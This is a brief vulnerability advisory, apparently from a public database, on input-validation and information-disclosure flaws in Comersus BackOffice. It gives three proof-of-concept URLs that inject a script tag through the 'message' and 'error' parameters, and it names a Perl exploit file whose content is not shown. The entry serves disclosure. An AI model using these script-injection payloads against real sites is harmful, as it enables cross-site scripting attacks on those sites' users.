Comersus BackOffice Multiple Input Validation And Information Disclosure Vulnerabilities

Comersus BackOffice Multiple Input Validation And Information Disclosure Vulnerabilities

No exploit is required.

The following proof of concept URI are available:
http://www.example.com/comersus/backofficelite/comersus_backoffice_message.asp?message=<script>alert('vul');</script>
http://www.example.com/comersus/backofficeplus/comersus_backoffice_message.asp?message=<script>alert('vul');</script>
http://www.example.com/comersus/backofficePlus/comersus_backoffice_supportError.asp?error=<script>alert('vul');</script>

The following proof of concept exploit is also available:

/data/vulnerabilities/exploits/backoffice_mult_exp.pl